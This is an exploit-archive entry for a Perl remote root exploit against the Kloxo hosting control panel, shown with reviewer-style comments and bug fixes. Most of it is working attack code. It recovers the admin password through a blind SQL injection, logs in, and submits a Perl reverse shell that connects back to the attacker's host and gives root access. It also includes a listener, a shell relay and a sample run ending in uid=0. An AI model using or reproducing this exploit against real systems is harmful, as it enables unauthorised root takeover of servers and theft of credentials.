#; Kloxo Remote Root Exploit

  1. Full title   Kloxo Remote Root Exploit
  2. Date add    2014-03-02
  3. Category    web applications
  4. Platform    linux
  5. Risk    Security Risk High
  6. Description  Kloxo remote root exploit that leverages a blind SQL injection and injects a perl connect back shell (/bin/sh) with root privilege.
  7.  
  8. =====================================
  9.  
  10. #!/usr/bin/perl
  11. #
  12. # Title: Kloxo remote root exploit              
  13. # Author: Simo Ben youssef
  14. # Contact: Simo_at_Morxploit_com
  15. # Coded: 28 January 2014
  16. # Published: 26 February 2014
  17. # MorXploit Research
  18. # http://www.MorXploit.com
  19. #
  20. # Download:
  21. # http://www.morxploit.com/morxploits/morxkloxo.pl
  22. #
  23. # Requires LWP::UserAgent
  24. # apt-get install libwww-perl
  25. # yum install perl-libwww-perl
  26. # perl -MCPAN -e 'install Bundle::LWP'
  27. # For SSL support:
  28. # apt-get install liblwp-protocol-https-perl
  29. # yum install perl-Crypt-SSLeay
  30. #
  31. # Tested on CentOS 5.8 and 5.9
  32. # Should work on CentOS/RHEL 5.x
  33. #
  34. # Author disclaimer:
  35. # The information contained in this entire document is for educational, demonstration and testing purposes only.
  36. # Author cannot be held responsible for any malicious use. Use at your own risk.
  37. #
  38. # perl morxkloxo.pl http://******.com:7778 **.**.**.** 31337
  39. #
  40. # ===================================================
  41. # --- Kloxo remote root exploit
  42. # --- By: Simo Ben youssef <simo_at_morxploit_com>
  43. # --- MorXploit Research www.MorXploit.com
  44. # ===================================================
  45. # [*] MorXploiting http://******.com:7778
  46. # [*] It might take a little while, so sit your ass down and relax
  47. # [+] Base64 pwd: bW9yeHBsb2l0
  48. # [+] Got admin password: morxploit
  49. # [*] Logging in ...
  50. # [+] Successfully logged in!
  51. # [*] Trying to get server info
  52. # [+] Done!
  53. # [*] Trying to inject connect back shell
  54. # [+] Looks good, now waiting for root shell
  55. # [+] Et voila you are in!
  56. #
  57. # Linux ******.com 2.6.18-308.8.2.el5.028stab101.1PAE #1 SMP Sun Jun 24 21:40:20 MSD 2012 i686 i686 i386 GNU/Linux
  58. # uid=0(root) gid=0(root)
  59.  
  use strict;
  use warnings;
  use IO::Socket;
  use LWP::UserAgent;
  use MIME::Base64;
  # Clear the terminal and print the tool banner. system() is given a single
  # argument with no shell metacharacters, so 'clear' is executed directly
  # without a shell; its exit status is ignored on purpose (cosmetic only).
  sub banner {
      system('clear');
      my @lines = (
          '===================================================',
          '--- Kloxo remote root exploit',
          '--- By: Simo Ben youssef <simo_at_morxploit_com>',
          '--- MorXploit Research www.MorXploit.com',
          '===================================================',
      );
      print map { "$_\n" } @lines;
  }
  73.  
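  # Usage check: target URL, connect-back IP and connect-back port are
  # mandatory, the fourth argument (verbose) is optional. The original wrote
  # `!defined($ARGV[0] && $ARGV[1] && $ARGV[2])`, relying on && to propagate
  # undef from the first missing argument -- obscure, and easy to misread as a
  # truthiness test. Counting the arguments states the intent directly.
  if (@ARGV < 3) {
      banner();
      print "perl $0 <target> <connectbackIP> <connectbackport> <verbose>\n";
      print "perl $0 http://localhost:7778 127.0.0.1 31337\n";
      exit;
  }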
  80.  
  # Command-line arguments: target base URL, connect-back host and port for the
  # reverse shell, and an optional verbose flag (any defined value enables it).
  my ($host, $cbhost, $cbport, $v) = @ARGV;

  # Blind-injection search parameters. $pos is the offset handed to
  # substring() on the `realpass` column, i.e. where extraction starts;
  # $start..$ends is the ASCII range the extraction loop may consult.
  my $pos   = 8;
  my $start = 48;
  my $ends  = 122;

  # State filled in as the exploit progresses (assigned further down).
  my $password;   # base64 text recovered one character at a time
  my $char;       # last matched character
  my $cookie;     # kloxo-session-id returned by the login
  my $decoded;    # base64-decoded admin password
  my $class;      # server object class scraped from display.php
  my $lhost;      # server object name scraped from display.php

  $| = 1;                    # unbuffered STDOUT so "\r" progress lines show up
  $SIG{CHLD} = 'IGNORE';     # auto-reap the relay child forked at the end
  96.  
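  # Validate the connect-back parameters before touching the network. Both are
  # later interpolated into a shell command that the target executes (the
  # reverse-shell payload), so restrict them to characters a real host name /
  # port consists of; anything else would break the payload or the shell line.
  die "[-] Bad connect-back port: $cbport\n"
      unless $cbport =~ /\A\d{1,5}\z/ && $cbport >= 1 && $cbport <= 65535;
  die "[-] Bad connect-back host: $cbhost\n"
      unless $cbhost =~ /\A[A-Za-z0-9.\-]+\z/;

  # Listener for the reverse shell. Bound to all interfaces because the
  # callback may arrive on whichever local address the target can reach;
  # ReuseAddr (the documented name of the old `Reuse` alias) lets the tool be
  # re-run right after a previous session without waiting out TIME_WAIT.
  my $l_sock = IO::Socket::INET->new(
      Proto     => 'tcp',
      LocalAddr => '0.0.0.0',
      LocalPort => $cbport,
      Listen    => 1,
      ReuseAddr => 1,
  ) or die "[-] Could not listen on $cbport: $!\n";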
  104.  
  # HTTP client used for the whole session. Certificate verification is
  # switched off (verify_hostname => 0), presumably because the panel is
  # usually served with a self-signed certificate. NOTE(review): this also
  # means everything sent later -- the recovered admin password and the
  # session cookie -- is readable by an on-path attacker.
  my $ua = LWP::UserAgent->new(
      ssl_opts => { verify_hostname => 0 },
  );
  $ua->timeout(10);

  # Reachability probe: give up with the HTTP status if the base URL does not
  # answer with a 2xx.
  my $up = $ua->get($host);
  if (!$up->is_success) {
      printf "[-] Error: %s\n", $up->status_line;
      exit;
  }
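  banner();
  print "[*] Verbose mode on!\n" if defined $v;
  print "[*] MorXploiting $host\n";
  print "[*] It might take a little while, so sit your ass down and relax\n";

  # Fingerprint: an unauthenticated request to lbin/webcommand.php is expected
  # to answer with a fixed Kloxo error token; anything else is treated as
  # "not Kloxo". The status code is deliberately not checked here, only the
  # body, as in the original.
  my $check = 'lbin/webcommand.php';
  my $kloxo = $ua->get("$host/$check");
  # A failed or empty response has no body; match against '' rather than undef.
  my $fp_body = $kloxo->decoded_content;
  $fp_body = '' unless defined $fp_body;
  unless ($fp_body =~ /__error_only_clients_and_auxiliary_allowed_to_login/) {
      print "[-] Doesn't seem like $host is running kloxo\n";
      exit;
  }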
  124.  
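  # Boolean-based blind SQL injection through the login-name parameter of
  # lbin/webcommand.php. The injected UNION SELECT returns a fixed crypt hash
  # (presumably the hash of the login-password value 123456 -- not verifiable
  # here) only when one character of `realpass`, taken with substring() at
  # offset $pos, equals the candidate ASCII code; a blank response is the
  # "true" oracle. Characters are recovered one offset at a time until an
  # offset yields no match.
  #
  # The candidate set is the full base64 alphabet. The original scanned
  # 48..122 (minus two gaps) and therefore never tried '+' (43) or '/' (47):
  # a stored value containing either was silently cut short and decoded
  # wrongly. The $start/$ends bounds declared earlier are no longer consulted.
  my @b64_codes = (43, 47, 48 .. 57, 61, 65 .. 90, 97 .. 122);

  POSITION: while (1) {
      my $found;
      CANDIDATE: for my $code (@b64_codes) {
          my $query = "lbin/webcommand.php?login-class=client&login-name=a%27%20union%20select%20%27%241%24Tw5.g72.%24/0X4oceEHjGOgJB/fqRww/%27%20from%20client%20where%20ascii%28substring%28%28%20select%20realpass%20from%20client%20limit%201%29%2c$pos%2c1%29%29%3d$code%23&login-password=123456";
          my $page = $ua->get("$host/$query");
          print "\r[*] Trying char/position: $code/$pos" if defined $v;
          my $body = $page->decoded_content;
          $body = '' unless defined $body;
          # Empty (whitespace-only) 2xx body == injected condition held.
          if ($page->is_success && $body =~ /^\s*$/) {
              $found = chr($code);
              last CANDIDATE;
          }
      }

      if (!defined $found) {
          # Nothing matched at this offset: either the value ended (done) or
          # nothing ever matched (not vulnerable, or a different schema).
          if (defined $password && length $password) {
              $decoded = decode_base64($password);
              print "\n[+] Got admin password: $decoded\n";
              last POSITION;
          }
          print "\n[-] Failed, probably not vulnerable\n";
          exit;
      }

      $password .= $found;
      print "\n" if defined $v;
      print "\r[+] Base64 pwd: $password";
      sleep 2 if defined $v;
      $pos++;
  }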
  156.  
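  print "[*] Logging in ...\n";
  # Authenticate as admin with the recovered password. Named $login rather
  # than $kloxo: the original re-declared `my $kloxo` in this scope, masking
  # the fingerprint response declared under the same name above.
  my $login = $ua->post(
      "$host/htmllib/phplib/",
      [
          frm_clientname => 'admin',
          frm_password   => "$decoded",
          login          => 'Login',
      ],
  );

  # The session id is pulled from the raw Set-Cookie header of this response
  # (the client has no cookie jar, so it is not stored automatically).
  if ($login->as_string =~ /Set-Cookie: kloxo-session-id=(.*?);/) {
      print "[+] Successfully logged in!\n";
      $cookie = $1;
  }
  else {
      print "[-] Couldn't log in\n";
      exit;
  }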
  168.  
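  print "[*] Trying to get server info\n";
  # The command-center form needs the class and name of the server object;
  # both are scraped from display.php, with defaults when scraping fails.
  my $session = "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie";
  my $getinfo = $ua->get("$host/display.php?frm_action=show", Cookie => $session);
  my $info = $getinfo->decoded_content;
  $info = '' unless defined $info;

  # Inner matches are tested explicitly: after a failed match $1 keeps its
  # previous value, so the original's unconditional `$class = $1` copied the
  # whole outer fragment into $class when the `value ="` pattern did not hit.
  $class = 'pserver';
  my $have_class = 0;
  if ($info =~ /commandcenter">(.*?)">/s) {
      my $pserver = $1;
      if ($pserver =~ /value =\"(.*)/) {
          $class = $1;
          $have_class = 1;
      }
  }
  print "[-] Couldn't get info, trying default settings\n" unless $have_class;

  # $class came from the target's page: quote it so it is matched literally
  # and cannot inject regex metacharacters into this pattern.
  $lhost = 'localhost';
  my $have_host = 0;
  if ($info =~ /name="frm_o_o\[0\]\[class\]" value ="\Q$class\E">(.*?)">/s) {
      my $nname = $1;
      if ($nname =~ /value =\"(.*)/) {
          $lhost = $1;
          $have_host = 1;
      }
  }
  print "[-] Couldn't get info, trying default settings\n" unless $have_host;
  print "[+] Done!\n";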
  190.  
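  print "[*] Trying to inject connect back shell\n";
  # Command submitted to Kloxo's command center. The sample run in the header
  # shows uid=0 for the resulting shell, i.e. Kloxo executes it as root. It is
  # a perl one-liner that forks, connects back to $cbhost:$cbport, dup()s the
  # socket over stdin/stdout/stderr and execs /bin/sh. The string is the
  # original payload, unchanged. $cbhost and $cbport land verbatim inside a
  # shell command on the target, so they must be plain host/port tokens.
  my $payload = "perl -MIO -e '\$p=fork;exit,if(\$p); use Socket; use FileHandle; my \$system = \"/bin/sh\"; my \$host = \"$cbhost\"; my \$port = \"$cbport\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\"tcp\")); connect(SOCKET, sockaddr_in(\$port, inet_aton(\$host))); SOCKET->autoflush(); open(STDIN, \">&SOCKET\"); open(STDOUT,\">&SOCKET\"); open(STDERR,\">&SOCKET\"); print \"[+] Et voila you are in!\\n\\n\"; system(\"uname -a;id\"); system(\$system);'";

  # The session client is reused; the original built a second agent with the
  # identical settings (verify_hostname => 0, 10s timeout) for this one call.
  my $inject = $ua->post(
      "$host/display.php",
      Content_Type => 'form-data',
      Cookie       => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie",
      Content      => [
          'frm_o_o[0][class]'             => "$class",
          'frm_o_o[0][nname]'             => "$lhost",
          'frm_pserver_c_ccenter_command' => $payload,
          'frm_action'                    => 'updateform',
          'frm_subaction'                 => 'commandcenter',
          'frm_change'                    => 'Execute',
      ],
  );
  # Check the status code. The original grepped the whole serialized response
  # for "200 OK", which any page body could also contain.
  unless ($inject->is_success) {
      print "[-] Something went wrong\n";
      exit;
  }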
  210.  
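  print "[+] Looks good, now waiting for root shell\n";

  # Block until the target calls back. accept() returns undef on failure; the
  # original handed that undef straight to the relay.
  my $a_sock = $l_sock->accept()
      or die "[-] accept failed: $!\n";
  # Single session: stop listening once the shell is connected.
  $l_sock->shutdown(SHUT_RDWR);
  copy_data_bidi($a_sock);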
  216.  
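  # Relay between the local terminal and the remote shell: a forked child
  # copies socket -> STDOUT while the parent copies STDIN -> socket. When the
  # parent's side ends (local EOF / write error) it half-closes the socket and
  # terminates the child. Caveat carried over from the original: if the remote
  # end closes first only the child notices, and the parent keeps blocking on
  # STDIN until the user sends EOF.
  #
  # $socket: connected IO::Socket handle. Returns nothing.
  sub copy_data_bidi {
      my ($socket) = @_;
      my $child_pid = fork();
      # fork() returns undef on failure. The original tested `!$child_pid`,
      # so a failed fork silently ran the child branch in the parent and
      # left a one-way relay; fail loudly instead.
      die "[-] fork failed: $!\n" unless defined $child_pid;

      if ($child_pid == 0) {
          # child: remote output -> terminal
          close(STDIN);
          copy_data_mono($socket, *STDOUT);
          $socket->shutdown(SHUT_RD);
          exit();
      }

      # parent: terminal input -> remote shell
      close(STDOUT);
      copy_data_mono(*STDIN, $socket);
      $socket->shutdown(SHUT_WR);
      kill("TERM", $child_pid);
      return;
  }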
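  # Copy everything readable from $src to $dst in 4 KiB chunks until EOF, a
  # read error, or a failed write. Both arguments are filehandles or sockets
  # usable with sysread/syswrite. Returns nothing.
  #
  # Fix: on a short write the original called `syswrite($dst, $buf)` again,
  # which restarts from the beginning of the buffer and duplicates the bytes
  # already sent. The LENGTH/OFFSET arguments now resume where the previous
  # write stopped.
  sub copy_data_mono {
      my ($src, $dst) = @_;
      my $buf;
      while (my $read_len = sysread($src, $buf, 4096)) {
          my $offset = 0;
          while ($offset < $read_len) {
              my $written_len = syswrite($dst, $buf, $read_len - $offset, $offset);
              return unless $written_len;
              $offset += $written_len;
          }
      }
      return;
  }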